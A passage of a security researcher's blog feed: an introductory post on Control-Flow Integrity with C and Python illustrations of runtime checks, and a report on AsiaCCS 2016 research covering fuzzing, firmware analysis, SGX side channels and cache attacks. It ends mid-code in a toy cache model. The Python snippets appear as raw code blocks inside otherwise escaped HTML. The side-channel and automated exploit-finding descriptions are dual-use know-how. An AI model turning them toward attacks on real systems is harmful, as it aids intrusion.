</content><category term="Security"></category><category term="privacy"></category><category term="encrypted memory"></category><category term="runtime monitor"></category></entry><entry><title>Control-Flow Integrity: An Introduction</title><link href="/blog/2016/0913-ControlFlowIntegrity.html" rel="alternate"></link><published>2016-09-13T16:28:00-04:00</published><updated>2016-09-13T16:28:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2016-09-13:/blog/2016/0913-ControlFlowIntegrity.html</id><summary type="html">&lt;p&gt;At a high level, Control-Flow Integrity (CFI) restricts the control-flow of an
application to &lt;em&gt;valid&lt;/em&gt; execution traces.  CFI enforces this property by
monitoring the program at runtime and comparing its state to a set of
precomputed valid states.  If an invalid state is detected, an alert is raised,
usually terminating …&lt;/p&gt;</summary><content type="html">&lt;p&gt;At a high level, Control-Flow Integrity (CFI) restricts the control-flow of an
application to &lt;em&gt;valid&lt;/em&gt; execution traces.  CFI enforces this property by
monitoring the program at runtime and comparing its state to a set of
precomputed valid states.  If an invalid state is detected, an alert is raised,
usually terminating the application.  As such, CFI belongs to the class of
defenses that leverage &lt;em&gt;runtime monitors&lt;/em&gt; to detect specific attack vectors
(control-flow hijacks for CFI), and then flag exploit attempts at runtime.
Other examples of runtime monitors include, e.g., ASan (Address Sanitizer,
targeting spatial memory corruption), UBSan (Undefined Behavior Sanitizer,
targeting undefined behavior in C/C++), or DangNull (targeting temporal memory
corruption).  Most of these monitors target development settings, detecting
violations when testing the program. CFI, on the other hand, is an active
defense mechanism and all modern compilers, e.g., GCC, LLVM, or Microsoft Visual
Studio implement a form of CFI with low overhead but different security
guarantees.&lt;/p&gt;
&lt;p&gt;CFI detects control-flow hijacking attacks by limiting the targets of
control-flow transfers. In a control-flow hijack attack an attacker redirects
the control-flow of the application to locations that would not be reached in a
benign execution, e.g., to injected code or to code that is reused in an
alternate context.&lt;/p&gt;
&lt;p&gt;Since the initial idea for the CFI defense mechanism &lt;a class="footnote-reference" href="#cfi" id="footnote-reference-1"&gt;[1]&lt;/a&gt; and the first (closed
source) prototype were presented in 2005, a plethora of alternate CFI-style
defenses have been proposed and implemented. While all these alternatives slightly
change the underlying enforcement or analysis, they all try to implement the CFI
policy. The goal of this blog post is neither to look at differences between
individual CFI mechanisms as we did in &lt;a class="footnote-reference" href="#cfisok" id="footnote-reference-2"&gt;[2]&lt;/a&gt; (see this paper for an
exhaustive enumeration of related work in the area of CFI) nor to compare CFI
against alternate mechanisms as we did in &lt;a class="footnote-reference" href="#cficpiblog" id="footnote-reference-3"&gt;[3]&lt;/a&gt;, but to explain
what CFI is, what it can do, and what its limits are.&lt;/p&gt;
&lt;p&gt;Any CFI mechanism consists of two abstract components: the (often static)
analysis component that recovers the Control-Flow Graph (CFG) of the application
(at different levels of precision) and the dynamic enforcement mechanism that
restricts control flows according to the generated CFG.&lt;/p&gt;
&lt;p&gt;The following sample code shows a simple program with 5 functions. The &lt;tt class="docutils literal"&gt;foo&lt;/tt&gt;
function uses a function pointer and the CFI mechanism injects both a
forward-edge and a backward-edge check. The function pointer either points to
&lt;tt class="docutils literal"&gt;bar&lt;/tt&gt; or &lt;tt class="docutils literal"&gt;baz&lt;/tt&gt;. Depending on the forward-edge analysis, different sets of
targets are allowed at runtime.&lt;/p&gt;
&lt;pre class="literal-block"&gt;
void bar();
void baz();
void buz();
void bez(int, int);

void foo(int usr) {
  void (*func)();

  // func either points to bar or baz
  if (usr == MAGIC)
    func = bar;
  else
    func = baz;

  // forward edge CFI check
  // depending on the precision of CFI:
  // a) all functions {bar, baz, buz, bez, foo} are allowed
  // b) all functions with prototype &amp;quot;void (*)()&amp;quot; are allowed,
  //    i.e., {bar, baz, buz}
  // c) only address taken functions are allowed, i.e., {bar, baz}
  CHECK_CFI_FORWARD(func);
  func();

  // backward edge CFI check
  CHECK_CFI_BACKWARD();
}
&lt;/pre&gt;
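&lt;p&gt;The three precision levels in the comments above can be sketched as set computations (a toy model; the function names and prototypes are taken from the example):&lt;/p&gt;

```python
# Toy model of the forward-edge precision levels from the example above.
funcs = {
    "bar": "void()", "baz": "void()", "buz": "void()",
    "bez": "void(int,int)", "foo": "void(int)",
}
address_taken = {"bar", "baz"}  # only bar and baz are assigned to func

level_a = set(funcs)                                      # a) any function
level_b = {f for f, t in funcs.items() if t == "void()"}  # b) same prototype
level_c = level_b & address_taken                         # c) address taken

print(sorted(level_a), sorted(level_b), sorted(level_c))
```

Each level shrinks the target set: from all five functions, to the three with a matching prototype, to the two that are actually address taken.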
&lt;div class="section" id="control-flow-transfer-primer"&gt;
&lt;h2&gt;Control-Flow Transfer Primer&lt;/h2&gt;
&lt;p&gt;Instructions on an architecture can be grouped into control-flow transfer
instructions and computational instructions. Computational instructions are
executed in sequence (one after the other), while control-flow transfer
instructions change control-flow in a specific way, conditionally or
unconditionally redirecting control-flow to a specific (code) location.&lt;/p&gt;
&lt;p&gt;Control-flow transfer instructions can be further grouped into direct and
indirect control-flow transfer instructions. The target of indirect
control-flow transfers depends on the runtime value, e.g., of a register or a
memory value, compared to direct control-flow transfers where the target is
usually encoded as immediate offset in the instruction itself.&lt;/p&gt;
&lt;p&gt;Direct control-flow transfers are straightforward to protect as, on most
architectures, executable code is read-only and therefore the target cannot be
modified by an attacker (even with arbitrary memory corruption as the write
protection bit must first be disabled). These direct control-flow transfers are
therefore protected through the read-only permission of individual memory pages
and the protection is enforced (at no overhead) by the underlying hardware (the
memory management unit). CFI assumes that executable code is read-only,
otherwise an attacker could simply overwrite code and remove the runtime
monitors.&lt;/p&gt;
&lt;p&gt;Indirect control-flow transfers are further divided into &lt;strong&gt;forward-edge&lt;/strong&gt;
control-flow transfers and &lt;strong&gt;backward-edge&lt;/strong&gt; control-flow transfers. Forward-edge
control-flow transfers direct code forward to a new location and are used in
indirect jump and indirect call instructions, which are mapped at the source code
level to, e.g., switch statements, indirect calls, or virtual calls. The
backward-edge is used to return to a location that was used in a forward-edge
earlier, e.g., when returning from a function call through a return instruction.
For simplicity, we leave interrupts, interrupt returns, and exceptions out of
the discussion.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="generating-control-flow-graphs"&gt;
&lt;h2&gt;Generating Control-Flow Graphs&lt;/h2&gt;
&lt;p&gt;A CFG is a graph that covers all valid executions of the program. Nodes in the
graph are locations of control-flow transfers in the program and edges encode
reachable targets. The CFG is an abstract concept and the different existing CFI
mechanisms use different approaches to generate the underlying CFGs using both
static and dynamic analysis, relying on either the binary or source code.&lt;/p&gt;
&lt;p&gt;For forward edges, the CFG generation enumerates all possible targets,
often leveraging information from the underlying source language. Switch
statements in C/C++ are a good example as the different targets are statically
known and the compiler can generate a fixed jump table and emit an indirect jump
with a bound check to guarantee that the target used at runtime is one of the
valid targets in the switch statement.&lt;/p&gt;
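&lt;p&gt;The emitted jump table with its bound check can be sketched as follows (Python stands in for the generated machine code; the case functions are placeholders):&lt;/p&gt;

```python
# Sketch of a bounds-checked jump table as emitted for a switch statement.
def case0(): return "zero"
def case1(): return "one"
def case2(): return "two"

jump_table = [case0, case1, case2]  # fixed table of valid targets

def dispatch(idx: int) -> str:
    # the bound check guarantees the indirect jump stays inside the table
    if not 0 <= idx < len(jump_table):
        raise SystemExit("CFI violation: switch index out of bounds")
    return jump_table[idx]()

print(dispatch(1))
```

Because the table itself lives in read-only memory and the index is bounds-checked, the indirect jump can only reach one of the statically known case labels.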
&lt;p&gt;For indirect function calls through a function pointer, the underlying analysis
becomes more complicated as the target may not be known a priori. Common
source-based analyses use a type-based approach and, looking at the function
prototype of the function pointer that is used, enumerate all matching
functions. Different CFI mechanisms use different forms of type equality, e.g.,
any valid function, functions with the same arity (number of arguments), or
functions with the same signature (arity and equivalence of argument types). At
runtime, any function with matching signature is allowed.&lt;/p&gt;
&lt;p&gt;Just looking at function prototypes likely yields several collisions where
functions are reachable that may never be called in practice. The analysis
therefore over-approximates the valid set of targets.  In practice, the compiler
can check which functions are &lt;strong&gt;address taken&lt;/strong&gt;, i.e., there is a source line
that generates the address of the function and stores it. The CFI mechanism may
reduce the number of allowed targets by intersecting the sets of equal function
prototypes and the set of address taken functions.&lt;/p&gt;
&lt;p&gt;For virtual calls, i.e., indirect calls in C++ that depend on the type of the
object and the class relationship, the analysis can further leverage the type of
the object to restrict the valid functions, e.g., all object constructors have
the same signature but only the subset of constructors of related classes is
feasible.&lt;/p&gt;
&lt;p&gt;So far, the constructed CFG is stateless, i.e., the &lt;em&gt;context of the execution&lt;/em&gt;
is not considered and each control-flow transfer is independent of all others.
On one hand, at runtime only one target is allowed for any possible transfer,
namely the target address currently stored at the memory location of the code
pointer. CFG construction, on the other hand, over-approximates the number of
valid targets with different granularities, depending on the precision of the
analysis. Some mechanisms take path constraints into consideration and check
(for a limited depth) if the path taken through the application is feasible by
using a dynamic analysis approach that validates the current execution. So far,
only a few mechanisms look at the path context as this incurs dynamic tracking
costs at runtime.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="enforcing-cfi"&gt;
&lt;h2&gt;Enforcing CFI&lt;/h2&gt;
&lt;p&gt;CFI can be enforced at different levels. Sometimes the analysis phase (CFG
construction) and enforcement phase even overlap, e.g., when considering path
constraints. Most mechanisms consist of two fundamental components, one for
forward-edge transfers and one for backward-edge transfers.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2016/0913/cfitransfers.png" /&gt;&lt;/p&gt;
&lt;p&gt;The figure shows how CFI restricts the set of possible target locations by
executing a runtime monitor that validates the target according to the
constructed set of allowed targets. If the observed target is not in that set,
the program terminates.&lt;/p&gt;
&lt;p&gt;For forward-edge transfers, the code is often instrumented with some form of
equivalence check. The check ensures that the target observed at runtime is in
the set of valid targets. This can be done through a full set check or a simple
type comparison that, e.g., hashes function prototypes and checks if the hash
for the current target equals the expected hash at the callsite. The hash for
the function can be embedded inline in the function, before the function, or in
an orthogonal metadata table.&lt;/p&gt;
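&lt;p&gt;The hash-based variant can be sketched as follows (an illustrative model, not any compiler's actual ABI; the hash function and label table are assumptions):&lt;/p&gt;

```python
import hashlib

def type_hash(prototype: str) -> bytes:
    # the compiler derives a short label from the function prototype
    return hashlib.sha256(prototype.encode()).digest()[:8]

# labels embedded next to each function at compile time (hypothetical)
labels = {"bar": type_hash("void()"), "bez": type_hash("void(int,int)")}

def check_cfi_forward(target: str, expected: bytes) -> None:
    # the callsite compares the callee's embedded label to its own
    # expected hash; a mismatch terminates the program
    if labels.get(target) != expected:
        raise SystemExit("CFI violation: invalid indirect call target")

check_cfi_forward("bar", type_hash("void()"))  # matching prototype: allowed
```

A call through a &lt;cite&gt;void (*)()&lt;/cite&gt; pointer thus passes only when the callee carries the matching prototype hash.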
&lt;p&gt;Backward-edge transfers are harder to protect as, when using the same approach,
the attacker may redirect the control-flow to any valid callsite when returning
from a function. Strong backward-edge protections therefore leverage the context
through the previously called functions on the stack. A mechanism that enforces
stack integrity ensures that any backward-edge transfers can only return to
the most recent prior caller. This property can be enforced by storing the prior
call sites in a shadow stack or guaranteeing memory safety on the stack, i.e.,
if the return instructions cannot be modified then stack integrity trivially
holds. Backward-edge control-flow enforcement is &amp;quot;easier&amp;quot; than forward-edge, as
the function calls and returns form a symbiotic relationship that can be
leveraged in the design of the defense, i.e., a function return always returns
to the location of the previous call. Such a relationship does not exist for the
forward-edge.&lt;/p&gt;
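&lt;p&gt;A shadow stack can be sketched in a few lines (a minimal model; real implementations instrument call/return instructions or rely on hardware support):&lt;/p&gt;

```python
# Minimal shadow-stack model: calls push the return address on a
# separate, protected stack; a return must match the most recent entry.
shadow = []

def on_call(ret_addr: int) -> None:
    shadow.append(ret_addr)

def on_return(ret_addr: int) -> None:
    expected = shadow.pop()
    if ret_addr != expected:
        raise SystemExit("CFI violation: return address corrupted")

on_call(0x401234)    # caller pushes its return address
on_return(0x401234)  # benign return matches and passes the check
```

Even if an attacker overwrites the return address on the regular stack, the mismatch with the shadow copy is detected at the return, enforcing stack integrity.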
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;If implemented correctly, CFI is a strong defense mechanism that restricts the
freedom of an attacker. Attackers may still corrupt memory, and data-only
attacks are still in scope. For the forward-edge, a strong mechanism must
consider language-specific semantics to restrict the set of valid targets as
much as possible. Additionally, most mechanisms for the forward-edge are
stateless and allow an attacker to redirect control-flow to any valid location
as identified by the CFG construction. Limiting the size of the target sets
constrains the attacker on the forward edge. For the backward edge, a
context-sensitive approach that enforces stack integrity guarantees full
protection.&lt;/p&gt;
&lt;table class="docutils footnote" frame="void" id="cfi" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;&lt;a class="fn-backref" href="#footnote-reference-1"&gt;[1]&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;a class="reference external" href="http://research.microsoft.com/pubs/64250/ccs05.pdf"&gt;Control-Flow Integrity. Martin Abadi, Mihai Budiu, Ulfar Erlingsson, Jay Ligatti. In CCS'05&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class="docutils footnote" frame="void" id="cfisok" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;&lt;a class="fn-backref" href="#footnote-reference-2"&gt;[2]&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;a class="reference external" href="https://arxiv.org/abs/1602.04056"&gt;Control-Flow Integrity: Precision, Security, And Performance. Nathan Burow, Scott A. Carr, Stefan Brunthaler, Mathias Payer, Joseph Nash, Per Larsen, Michael Franz&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class="docutils footnote" frame="void" id="cficpiblog" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;&lt;a class="fn-backref" href="#footnote-reference-3"&gt;[3]&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;a class="reference external" href="/blog/2014/1007-CFICPSCPIdiffs.html"&gt;On differences between the CFI, CPS, and CPI properties. Mathias Payer and Volodymyr Kuznetsov&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
</content><category term="Security"></category><category term="defense"></category><category term="runtime monitor"></category><category term="CFI"></category></entry><entry><title>AsiaCCS and China</title><link href="/blog/2016/0621-AsiaCCS.html" rel="alternate"></link><published>2016-06-21T16:56:00-04:00</published><updated>2016-06-21T16:56:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2016-06-21:/blog/2016/0621-AsiaCCS.html</id><summary type="html">&lt;p&gt;The last three weeks I've been traveling through China, Hong Kong, and Macau on
an interesting security tour thanks to this year's AsiaCCS being held in Xi'an,
China. AsiaCCS was right after Oakland, so I flew directly from San Francisco to
Xi'an China and then continued to visit friends at …&lt;/p&gt;</summary><content type="html">&lt;p&gt;The last three weeks I've been traveling through China, Hong Kong, and Macau on
an interesting security tour thanks to this year's AsiaCCS being held in Xi'an,
China. AsiaCCS was right after Oakland, so I flew directly from San Francisco to
Xi'an China and then continued to visit friends at Beijing, Shanghai, and Hong
Kong/Macau. Overall, Asia has been a breathtaking experience with an immense
set of impressions that I'll try to summarize in a country-specific blog post.
Here, I'll focus on the research aspects and the conference.&lt;/p&gt;
&lt;p&gt;AsiaCCS is in the process of migrating from a symposium to a full conference.
While not exactly in the big four, the conference is still fairly competitive
and has a tendency to accept good papers that just did not make it at the big
four. One of the challenges, shared with CCS proper, is that there is no
physical PC meeting and therefore no overall quality control and discussion of
the papers. This shows, in my opinion, in the slightly higher randomness in
paper selection that we see each year compared to conferences that have real
on-site PC meetings.&lt;/p&gt;
&lt;p&gt;This was my first AsiaCCS and I left with an OK impression. The conference was
fairly well organized with an exciting dinner and great people to talk to.
Compared to the big four, AsiaCCS has the problem that many people only attend
for a day and then head off for sight-seeing, so if you want to meet with others
you actively have to coordinate (compared to other conferences where you'll just
walk into each other by accident as, let's be honest, San Jose does not have
that much to offer for tourists). On the downside, the Internet is a mess in China
with lots of sites blocked, connections timing out, and even VPN sessions being
randomly killed and subverted by the great firewall. After a couple of annoying
weeks I found out that an SSH SOCKS proxy works much better than OpenVPN.&lt;/p&gt;
&lt;p&gt;On the paper side, I attended all interesting sessions and also asked my fair
share of questions. There were a bunch of interesting papers and keynotes that
I'll discuss below. In general, I enjoyed the diverse keynotes, especially
Michael Backes' call for privacy research and Giovanni Vigna's shameless plug
for angr and collaborative systems research.&lt;/p&gt;
&lt;div class="section" id="touchalytics"&gt;
&lt;h2&gt;TouchAlytics&lt;/h2&gt;
&lt;p&gt;Let me begin this blog post with a shameless plug of our TouchAlytics work.  We
finally published our &lt;a class="reference external" href="https://nebelwelt.net/publications/files/16AsiaCCS.pdf"&gt;TouchAlytics&lt;/a&gt; paper at AsiaCCS
(&lt;a class="reference external" href="https://nebelwelt.net/publications/files/16AsiaCCS-presentation.pdf"&gt;slides&lt;/a&gt;)
and I was the only author who was willing and managed to get a visa for China.
In our paper we propose a forgery-resistant touch-based authentication method
that uses how people react and adapt to different environments as biometrics
instead of something people &amp;quot;have&amp;quot; as in classical biometrics.&lt;/p&gt;
&lt;p&gt;Our authentication method samples a user in different environments (that we
control) and then uses this information to subtly and continuously change the
underlying environment. As the user adapts her behavior, she is authenticated
against the different profiles we collected.  As attackers do not know what
environment is used during the authentication, they cannot forge an
authentication, even with perfect information of all possible environments.&lt;/p&gt;
&lt;p&gt;In our prototype we add an adaptive layer between the touchscreen sensor and the
display that allows us to stretch individual strokes into both dimensions. The
application therefore receives slightly different strokes than the user executes
on the touchscreen. Due to the different app behavior the user will adapt her
strokes accordingly and we use this adaptation to identify and authenticate the
user based on the slight variances. Our authentication framework is both stable
and sensitive, i.e., it allows us to differentiate between different settings
for a single user and between different users.  This work moves biometrics from
a &amp;quot;what you have&amp;quot; to a &amp;quot;how you react&amp;quot;-based authentication.&lt;/p&gt;
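&lt;p&gt;As a rough sketch of the kind of stroke stretching the adaptive layer
performs (the function and scaling factors are illustrative only, not the
pipeline from the paper):&lt;/p&gt;

```python
def stretch_stroke(points, sx, sy, origin=(0.0, 0.0)):
    """Scale a stroke (a list of (x, y) touch samples) around an origin.

    The adaptive layer sits between the touchscreen sensor and the display,
    so the app sees stretched coordinates while the user performs the
    original stroke; the user's compensation is what gets measured.
    """
    ox, oy = origin
    return [(ox + (x - ox) * sx, oy + (y - oy) * sy) for (x, y) in points]

stroke = [(0.0, 0.0), (1.0, 1.0), (2.0, 4.0)]
print(stretch_stroke(stroke, 1.5, 0.5))  # → [(0.0, 0.0), (1.5, 0.5), (3.0, 2.0)]
```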
&lt;/div&gt;
&lt;div class="section" id="an-angr-y-keynote"&gt;
&lt;h2&gt;An angr'y keynote&lt;/h2&gt;
&lt;p&gt;The best talk at AsiaCCS was Giovanni's angr'y keynote in my opinion. Based on
the premise that hacking is awesome, Giovanni and his group want to automate
awesomeness. Hacking can be manifold and can involve hacking the user through
social engineering, hacking the process through weak password resets, weak PINs,
or bruteforce attacks, or hacking the code. Hacking the code is the most
involved as actual knowledge and intelligence is needed. The question is if we
can incorporate the domain knowledge and intelligence into a tool. Angr is a
framework that tries to achieve that.&lt;/p&gt;
&lt;p&gt;Binary code on the one hand is incredibly difficult as it has a (very) low
abstraction level, no structured types, no modules and no defined functions. In
addition, compiler optimizations make code very complex. On the other hand,
binary code is truthful: what you see is what you execute. In manual
vulnerability analysis, a very intelligent person stares at the code and sees
what she can find. This approach discovers deep and complex vulnerabilities but
does not scale. The holy grail of vulnerability research is a magic tool that,
when run, finds the vulnerability and develops a patch/exploit for it.&lt;/p&gt;
&lt;p&gt;Automatic vulnerability analysis systems have a high level policy and try to
force violations. Such an approach requires replayability, i.e., the ability to
generate attack instances. These systems try to generate inputs that, when fed
to the program generate a violation. Such a violation is then a proof-of-concept
exploit (depending on the high level policy). An orthogonal aspect is semantic
insight, i.e., the ability to understand the root cause of the crash which will
allow the attacker to abstract and generalize from the single fault.&lt;/p&gt;
&lt;p&gt;A problem that automatic vulnerability analysis systems face is that these
goals trade off against each other: high replayability implies low coverage;
low replayability implies false positives; semantic insight implies high
overhead; and replayability combined with semantic insight implies low
scalability and a lack of soundness, which results in false negatives.
Heuristics therefore need to balance these different options
to achieve good results. Both static and dynamic analyses can be used to
evaluate the search space.&lt;/p&gt;
&lt;p&gt;Static analysis has the advantage of high coverage but is complex and runs into
the aliasing problem. Dynamic analysis on the other hand has high replayability,
does not worry about aliasing but runs into coverage problems. So far, angr
focused on a binary analysis toolkit, providing static analysis and symbolic
execution. For the DARPA cyber grand challenge, the UC Santa Barbara folks
extended angr and combined angr and AFL into Driller. Surprisingly, fuzzing is
the most effective technique at finding bugs. Generating random inputs and
feeding those into a program discovers a large number of vulnerabilities but has
the tendency to get stuck with limited coverage. AFL tries to address the
coverage problem through a path-guided analysis that records which paths were
already evaluated and forces input mutations to evaluate alternate paths. In
Driller, whenever AFL gets stuck it evaluates the paths using symbolic execution
to find alternate inputs that trigger new paths.&lt;/p&gt;
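&lt;p&gt;The interplay can be sketched as a toy hybrid loop. The target, the
coverage map, and the stand-in "solver" are invented for illustration; Driller
itself drives AFL and angr's symbolic executor rather than this simplification:&lt;/p&gt;

```python
import random

COVERAGE = set()

def target(data: bytes) -> str:
    """Toy target with a nested magic-byte check that random mutation
    essentially never passes, so plain fuzzing gets stuck."""
    COVERAGE.add("entry")
    if data[:4] == b"MAGI":
        COVERAGE.add("magic")
        if len(data) > 4 and data[4] == 0x42:
            COVERAGE.add("bug")
            return "crash"
    return "ok"

def solve_stuck_branch() -> bytes:
    # Stand-in for the symbolic-execution step: a real system would replay
    # the stuck path and ask a solver for bytes that flip the first
    # uncovered branch. Here we simply hand back the known answers.
    if "magic" not in COVERAGE:
        return b"MAGI\x00"
    return b"MAGI\x42"

def hybrid_fuzz(rounds=5000, stall_limit=100):
    pool = [b"AAAA\x00"]
    stall = 0
    for _ in range(rounds):
        seed = random.choice(pool)
        i = random.randrange(len(seed))
        data = seed[:i] + bytes([random.randrange(256)]) + seed[i + 1:]
        if stall >= stall_limit:          # fuzzer is stuck: consult the solver
            data = solve_stuck_branch()
            stall = 0
        before = len(COVERAGE)
        if target(data) == "crash":
            return data
        if len(COVERAGE) > before:        # new path: keep the input
            pool.append(data)
            stall = 0
        else:
            stall += 1
    return None

print(hybrid_fuzz())  # → b'MAGIB', i.e. b"MAGI\x42"
```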
&lt;p&gt;In the later part of the keynote, Giovanni also talked about some details of the
cyber grand challenge, infrastructure availability (never segfault your
infrastructure), analysis scalability (how to cope with limited resources), and
the performance/security trade-off.&lt;/p&gt;
&lt;p&gt;In our current system the attacker is at an inherent advantage as it takes one
single vulnerability to bring down a system but the defender needs to cover all
bases. We need to move forward as a community to provide better analysis tools
and better general defense techniques that actually hold up to attacks.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="automatic-dynamic-firmware-analysis-at-scale-a-case-study-on-embedded-web-interfaces"&gt;
&lt;h2&gt;Automatic Dynamic Firmware Analysis at Scale: A Case Study on Embedded Web Interfaces&lt;/h2&gt;
&lt;p&gt;In this work, Andrei Costin, Apostolis Zarras, and Aurelien Francillon extend
their framework for automatic firmware collection and extraction. In addition to
searching for simple bugs using pattern matching, they now run the images
inside QEMU and exercise the web interface in the image. Their existing
infrastructure already collects information and extracts the individual files of
the firmware. They have now built a QEMU emulator that runs some of the binaries
in the firmware. Many IoT devices like routers primarily run a single suid/root
binary that encapsulates all the functionality of the device.&lt;/p&gt;
&lt;p&gt;After getting the binary to run through some hackery, they run basic
vulnerability discovery and penetration testing tools to find vulnerabilities in
the services and had good results. A problem they ran into was that those
service binaries often have hardware specific calls and kernel issues that
reduce their coverage.&lt;/p&gt;
&lt;p&gt;In the last year we (Craig West, Jacek Rzeniewicz, and myself) have looked at a
similar problem. We got stuck at the same location where the service binaries
were calling into the kernel or reading/writing privileged flash areas that we
could not easily emulate. Also, instead of running simple penetration testing
tools, it would be much more interesting to run something like AFL. We have tried
integrating AFL into our own QEMU-based framework (yeah, we went down almost the
same path in our research) but could not get the path-based feedback to work and
AFL was therefore limited in the input it could generate. This might be an
interesting project to continue, so if anyone is interested, please reach out.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="origen-automatic-extraction-of-offset-revealing-instructions-for-cross-version-memory-analysis"&gt;
&lt;h2&gt;ORIGEN: Automatic Extraction of Offset-Revealing Instructions for Cross-Version Memory Analysis&lt;/h2&gt;
&lt;p&gt;An interesting challenge for forensics tools is to recover data structures from
memory images. Unfortunately, these data structures change as new fields are
added or removed whenever software evolves. The fingerprints are therefore tied
to specific software versions.&lt;/p&gt;
&lt;p&gt;Qian Feng, Aravind Prakash, Minghua Wang, Curtis Carmony, and Heng Yin evaluated
how software evolves and how structures change between releases. They line up
code that accesses the same struct across releases and compare the offsets used
by the individual accessing instructions. As these offsets change between
releases, the changes in the struct layout can be recovered directly from the
code that accesses it.&lt;/p&gt;
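&lt;p&gt;The underlying observation is easy to demonstrate with two hypothetical
struct versions. The field names are made up, and ctypes stands in for the
compiled accessor code whose instruction offsets ORIGEN actually compares:&lt;/p&gt;

```python
import ctypes

class TaskV1(ctypes.Structure):
    """A struct as laid out in release 1 (hypothetical example)."""
    _fields_ = [("state", ctypes.c_long),
                ("flags", ctypes.c_ulong),
                ("pid", ctypes.c_int)]

class TaskV2(ctypes.Structure):
    """Release 2 inserted a field before pid, shifting its offset."""
    _fields_ = [("state", ctypes.c_long),
                ("flags", ctypes.c_ulong),
                ("on_cpu", ctypes.c_int),   # new field in release 2
                ("pid", ctypes.c_int)]

# Lining up accesses to the same member across releases reveals the shift.
for name in ("state", "flags", "pid"):
    v1 = getattr(TaskV1, name).offset
    v2 = getattr(TaskV2, name).offset
    print(f"{name}: v1 offset {v1}, v2 offset {v2}")
```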
&lt;p&gt;During the Q and A I wondered how resilient the approach is to changes in
compiler settings and across compiler optimizations. This will unfortunately
disrupt the tracking and pose some difficulties, so more research is needed in
that regard. Nevertheless, this work is an interesting approach to this
challenge.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="preventing-page-faults-from-telling-your-secrets"&gt;
&lt;h2&gt;Preventing Page Faults from Telling your Secrets&lt;/h2&gt;
&lt;p&gt;For SGX, the operating system manages individual memory pages of enclaves. This
enables a side channel where the OS restricts the amount of pages an enclave
gets and learns which pages are accessed.&lt;/p&gt;
&lt;p&gt;Shweta Shinde, Zheng Leong Chua, Viswesh Narayanan, and Prateek Saxena present a
compiler-based defense against such pigeon-hole attacks that makes all page
accesses deterministic. The defense assumes that the OS cannot distinguish
between accesses on a single page (i.e., OS cannot learn the offset in the page,
just the page itself). Make program page fault oblivious.&lt;/p&gt;
&lt;p&gt;The programmer then marks which part of the program is hardened against attacks
and marks code and data that is accessed. The compiler then rearranges code and
data on that page. Code and data are then moved onto staging pages before they
are used and only executed/accessed from those pages. The programmer controls
selective optimization and everything is hand tuned. Such an approach is a
simple solution but does not scale to larger code bases and involves a lot of
manual effort. A hardware-based extension allows an application to enforce a
contract that specific pages cannot be unloaded and the enclave is then informed
about page faults (such a mechanism is available in newer SGX versions).&lt;/p&gt;
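&lt;p&gt;The core idea of deterministic page accesses can be sketched in a toy model.
The page size, table layout, and helper names are invented; this is a model of
the property, not the authors' compiler pass:&lt;/p&gt;

```python
PAGE = 4096
trace = []   # pages an adversarial OS would observe being faulted in

def access(buffer, index):
    trace.append(index // PAGE)       # the OS sees the page, not the offset
    return buffer[index]

def lookup_leaky(tables, secret_bit, index):
    # Touches only one of two page-aligned tables: the page trace
    # reveals the secret bit to an OS watching enclave page faults.
    return access(tables, secret_bit * PAGE + index)

def lookup_oblivious(tables, secret_bit, index):
    # Touch both pages every time and select the wanted value afterwards:
    # the page-access sequence is now independent of the secret.
    a = access(tables, 0 * PAGE + index)
    b = access(tables, 1 * PAGE + index)
    return b if secret_bit else a

tables = bytes(range(256)) * 32       # two "pages" of table data
print(lookup_leaky(tables, 1, 7), lookup_oblivious(tables, 1, 7))  # → 7 7
```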
&lt;p&gt;While individual accesses are no longer observable, copying code and data to
staging pages still leaks information. In addition, the programmer effort will
reduce automation and will make it hard to deploy such a defense. While the work
presents an interesting start, I wonder about how much more this can be
automated and how effective the side-channel reduction is in practice (e.g., for
larger applications).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="cross-processor-cache-attacks"&gt;
&lt;h2&gt;Cross Processor Cache Attacks&lt;/h2&gt;
&lt;p&gt;In this attack paper, Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar present
an interesting side channel that is based on the cache coherency protocol
instead of cache access times. All existing cache side channels like flush and
reload or prime and probe rely on cache inclusiveness and will not port to
architectures like AMD's. The authors target exclusive last-level caches as
present on AMD architectures. Their attack enables a cross-CPU attack called
invalidate and transfer.&lt;/p&gt;
&lt;p&gt;The attack uses the cache coherency protocol to invalidate a memory block
(flushing the block from all caches) and then waits for computation to happen.
Afterwards, the same block is requested again and the access time is measured.
If another CPU has already requested the block then the transfer time is lower
than refreshing it from DRAM, resulting in a side-channel.&lt;/p&gt;
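&lt;p&gt;A toy model of the invalidate-and-transfer measurement; the latency
constants are illustrative and the coherency protocol is heavily simplified:&lt;/p&gt;

```python
DRAM_LATENCY, CACHE_TRANSFER_LATENCY = 300, 100   # illustrative cycle counts

class System:
    """Toy model of per-CPU caches under an exclusive last-level cache."""
    def __init__(self, cpus=2):
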